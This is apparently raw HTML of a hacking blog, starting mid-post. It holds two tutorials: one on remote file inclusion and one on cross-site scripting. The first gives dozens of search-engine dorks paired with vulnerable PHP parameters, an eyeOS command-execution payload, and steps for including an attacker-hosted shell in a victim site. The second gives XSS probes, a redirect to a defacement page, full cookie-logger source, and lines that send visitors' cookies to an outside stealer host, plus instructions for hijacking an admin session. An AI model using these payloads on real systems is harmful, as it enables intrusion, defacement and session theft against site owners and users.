<br />
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php<br />
yahoo = by Kietu? v 3.2<br />
/kietu/index.php?kietu[url_hit]=<br />
<br />
11. keyword : "Powered by phpBB 2.0.6"<br />
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=<br />
<br />
12. keyword : "powered by CubeCart 3.0.6"<br />
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=<br />
<br />
13. keyword : "powered by paBugs 2.0 Beta 3"<br />
/class.mysql.php?path_to_bt_dir=<br />
<br />
14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php<br />
/ashnews.php?pathtoashnews=<br />
<br />
15. keyword : /phorum/login.php<br />
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=<br />
<br />
16. allinurl:ihm.php?p=*<br />
<br />
14. keyword : "powered eyeOs"<br />
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id<br />
diganti dengan :<br />
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); &a=<br />
<br />
15. allinurl:.php?bodyfile=<br />
<br />
16. allinurl:/includes/orderSuccess.inc.php?glob=<br />
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=<br />
<br />
17. allinurl:forums.html<br />
/modules.php?name=<br />
<br />
18. allinurl:/default.php?page=home<br />
<br />
19. allinurl:/folder.php?id=<br />
<br />
20. allinurl:main.php?pagina=<br />
/paginedinamiche/main.php?pagina=<br />
<br />
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
22. allinurl:application.php?base_path=<br />
/application.php?base_path=<br />
<br />
23. allinurlp:hplivehelper<br />
/phplivehelper/initiate.php?abs_path=<br />
<br />
24. allinurlp:hpnuke<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
25. key word : "powered by Fantastic News v2.1.2"<br />
/archive.php?CONFIG[script_path]=<br />
<br />
26. keyword: "powered by smartblog" AND inurl:?page=login<br />
/index.php?page=<br />
<br />
27. allinurl:/forum/<br />
/forum/admin/index.php?inc_conf=<br />
<br />
28. keyword:"Powered By FusionPHP"<br />
/templates/headline_temp.php?nst_inc=<br />
<br />
29. allinurl:shoutbox/expanded.php filetypep:hp<br />
/shoutbox/expanded.php?conf=<br />
<br />
30. allinurl: /osticket/<br />
/osticket/include/main.php?config[search_disp]=true&include_dir=<br />
<br />
31. keyword : "Powered by iUser"<br />
/common.php?include_path=<br />
<br />
32. allinurl: "static.php?load="<br />
/static.php?load=<br />
<br />
33. keyworld : /phpcoin/login.php<br />
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=<br />
<br />
34. keyworld: allinurl:/phpGedview/login.php site:<br />
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=<br />
<br />
35. allinurl:/folder.php?id=<br />
/classes.php?LOCAL_PATH=<br />
<br />
inurl:"/lire.php?rub="<br />
<br />
inurl:"/os/pointer.php?url="<br />
<br />
inurl:"folder.php?id="<br />
<br />
inurl:"show.php?page="<br />
<br />
inurl:"index2.php?DoAction="<br />
<br />
inurl:"index.php?canal="<br />
<br />
inurl:"index.php?screen="<br />
<br />
inurl:"index.php?langc="<br />
<br />
inurl:"index.php?Language="<br />
<br />
inurl:"view.php?page="<br />
<br />
dork: "powered by doodle cart"<br />
rfi of this dork: enc/content.php?Home_Path=<br />
<br />
dork: "Login to Calendar"<br />
rfi of this dork: /embed/day.php?path=<br />
<br />
dork: "powered by EQdkp"<br />
rfi of this dork: /includes/dbal.php?eqdkp_root_path=<br />
<br />
inurl:"template.php?goto="<br />
<br />
inurl:"video.php?content="<br />
<br />
inurl:"pages.php?page="<br />
<br />
inurl:"index1.php?choix="<br />
<br />
inurl:"index1.php?menu="<br />
<br />
inurl:"index2.php?ascii_seite="<br />
<br />
dork: inurl:surveys<br />
rfi to this dork: /surveys/survey.inc.php?path=<br />
<br />
inurl:"index.php?body="<br />
<br />
dork: allinurl:adobt sitel<br />
rfi to this dork: /classes/adodbt/sql.php?classes_dir=<br />
<br />
dork: "Powered By ScozNews"<br />
rfi to this dork: /sources/functions.php?CONFIG[main_path]=<br />
rfi to this dork: /sources/template.php?CONFIG[main_path]=<br />
<br />
inurl:"kb_constants.php?module_root_path="<br />
<br />
dork: allinurl:"mcf.php"<br />
rfi to this dork: /mcf.php?content=<br />
<br />
dork: inurl:"main.php?sayfa="<br />
rfi to this dork: /main.php?sayfa=<br />
<br />
dork: "MobilePublisherPHP"<br />
rfi to this dork: /header.php?abspath=<br />
<br />
dork: "powered by phpCOIN 1.2.3"<br />
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=<br />
<br />
allinurl:login.php?dir=<br />
<br />
inurl:"index.php?go="<br />
<br />
inurl:"index1.php?="<br />
<br />
inurl:"lib/gore.php?libpath="<br />
<br />
inurl:"index2.php?p="</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Exploit scanners: <a href="http://www.youtube.com/v/f6SOzynrWx4" target="_blank">http://www.youtube.com/v/f6SOzynrWx4</a><br />
<br />
<span style="text-decoration: underline;">We've got our target, how do we exploit this vulnerability?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.<br />
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?p=interview.php</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.<br />
<br />
<span style="text-decoration: underline;">Tweaking and exploiting.</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
So now we want to tweak this to our advantage. This is rather simple.<br />
<br />
<span style="text-decoration: underline;">What you will need.</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).<br />
You will need to upload it to any website hosting.<br />
So once you have uploaded your shell to your website, it should look like this.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://yoursite.com/shell.txt</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
<span style="text-decoration: underline;">Including our shell to our slave's website.</span><br />
Okay, once we are at the vulnerable page (<a href="http://victimsite.com/index.php?p=include.php%29" target="_blank">http://victimsite.com/index.php?p=include.php)</a> we want to replace "include.php" and include our own file.<br />
Our new link should look like this.<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it.<br />
<br />
Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?%00".</span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
<br />
I hope this helps. Happy hacking.</span><span style="color: #666666;"> </span></b></span></div>Unknownnoreply@blogger.com11tag:blogger.com,1999:blog-3299468824600484367.post-70107017812216867342011-08-27T21:38:00.000-07:002011-08-27T21:38:17.931-07:00XSS - Cross Site Scripting.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">What is XSS, what can I accomplish with it?</span></span></b> <b><br />
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.<br />
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">What causes the vulnerability?</span></span></b> <b><br />
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.<br />
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">What types of XSS are there?</span></span></b> <b><br />
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.<br />
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">What will you be teaching today?</span></span></b> <b><br />
The basics of XSS and cookie logging.<br />
<br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">How to test for XSS vulnerabilities.</span></span></b> <b><br />
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.<br />
</b> </span> </div><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>alert('XSS');</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> We now see a pop up message on our screen saying "XSS". This is what it should look like: </span><a href="http://img845.imageshack.us/img845/7924/xss1.png" style="color: #666666;" target="_blank">http://img845.imageshack.us/img845/7924/xss1.png</a><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.</span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>"><script>alert('XSS');</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Okay, we have found out that it is vulnerable. We can now move on.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How can I deface a webpage with XSS?</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> I will be showing you methods for persistent, and non-persistent XSS.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Persistent XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:</span><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>window.location="http://yourdefacepage.com/index.html";</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Remember, you can always alter the code if it doesn't work.</span><br style="color: #666666;" /><span style="color: #666666;"> You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Non-persistent XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How to make a cookie logger.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Make two files:</span><br style="color: #666666;" /><span style="color: #666666;"> Cookiemonster.php</span><br style="color: #666666;" /><span style="color: #666666;"> Cookies.txt</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> Cookiemonster.php:</span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
/*<br />
* Created on 16. april. 2007<br />
* Created by Audun Larsen (audun@munio.no)<br />
*<br />
* Copyright 2006 Munio IT, Audun Larsen<br />
* <br />
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,<br />
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS<br />
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE<br />
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES<br />
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;<br />
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,<br />
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,<br />
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. <br />
*/<br />
<br />
if(strlen($_SERVER['QUERY_STRING']) > 0) {<br />
$fp=fopen('./cookies.txt', 'a');<br />
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");<br />
fclose($fp);<br />
} else {<br />
?><br />
<br />
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';<br />
<br />
// ==<br />
// URLEncode and URLDecode functions<br />
//<br />
// Copyright Albion Research Ltd. 2002<br />
// http://www.albionresearch.com/<br />
//<br />
// You may copy these functions providing that <br />
// (a) you leave this copyright notice intact, and <br />
// (b) if you use these functions on a publicly accessible<br />
// web site you include a credit somewhere on the web site <br />
// with a link back to http://www.albionresearch.com/<br />
//<br />
// If you find or fix any bugs, please let us know at albionresearch.com<br />
//<br />
// SpecialThanks to Neelesh Thakur for being the first to<br />
// report a bug in URLDecode() - now fixed 2003-02-19.<br />
// And thanks to everyone else who has provided comments and suggestions.<br />
// ==<br />
function URLEncode(str)<br />
{<br />
// The Javascript escape and unescape functions do not correspond<br />
// with what browsers actually do...<br />
var SAFECHARS = "0123456789" + // Numeric<br />
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic<br />
"abcdefghijklmnopqrstuvwxyz" +<br />
"-_.!~*'()"; // RFC2396 Mark characters<br />
var HEX = "0123456789ABCDEF";<br />
<br />
var plaintext = str;<br />
var encoded = "";<br />
for (var i = 0; i < plaintext.length; i++ ) {<br />
var ch = plaintext.charAt(i);<br />
if (ch == " ") {<br />
encoded += "+"; // x-www-urlencoded, rather than %20<br />
} else if (SAFECHARS.indexOf(ch) != -1) {<br />
encoded += ch;<br />
} else {<br />
var charCode = ch.charCodeAt(0);<br />
if (charCode > 255) {<br />
alert( "Unicode Character '" <br />
+ ch <br />
+ "' cannot be encoded using standard URL encoding.\n" +<br />
"(URL encoding only supports 8-bit characters.)\n" +<br />
"A space (+) will be substituted." );<br />
encoded += "+";<br />
} else {<br />
encoded += "%";<br />
encoded += HEX.charAt((charCode >> 4) & 0xF);<br />
encoded += HEX.charAt(charCode & 0xF);<br />
}<br />
}<br />
} // for<br />
<br />
return encoded;<br />
};<br />
<br />
cookie = URLEncode(document.cookie);<br />
html = '<img src="'+ownUrl+'?'+cookie+'">';<br />
document.write(html);<br />
<br />
< ?php<br />
}<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> Then just leave cookies.txt blank. But make sure you made the file.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">How do I send my cookie logger to my slave?</span></span></b> <b><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><a href="javascript:document.location='http://www.mysite.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /></b> </span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">What does a cookie look like?</span></span><br style="color: #666666;" /><span style="color: #666666;"> Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"</span><br style="color: #666666;" /><span style="color: #666666;"> The cookie is the string after "PHPSESSID="</span><br style="color: #666666;" /><span style="color: #666666;"> There are different forms of cookies. If you have your cookie logger setup correctly it won't matter, just copy and paste it all into your cookie editor.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">What can I do with someone else's cookie?</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> Once you have someone else's cookie you can use a cookie editor, (search for one on Google) go to the victims website, change your cookie to their's and you should be logged in as the user they are. Example; if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> </span><span style="color: #666666; font-weight: bold;"><span style="text-decoration: underline;">Using other programming languages for XSS.</span></span></b> <b><br style="color: #666666;" /><span style="color: #666666;"> It's simple, to test if it's vulnerable try this.</span><br style="color: #666666;" /></b> </span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><html><font color = "red">XSS</font></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"> <b><br style="color: #666666;" /><span style="color: #666666;"> If the text says XSS in red, then it's vulnerable to HTML injection as well. Just inject other languages in, and you will be able to do much more.</span><br style="color: #666666;" /><br style="color: #666666;" /><span style="color: #666666;"> I hope this helps. Happy hacking.</span></b> </span></div>Unknownnoreply@blogger.com1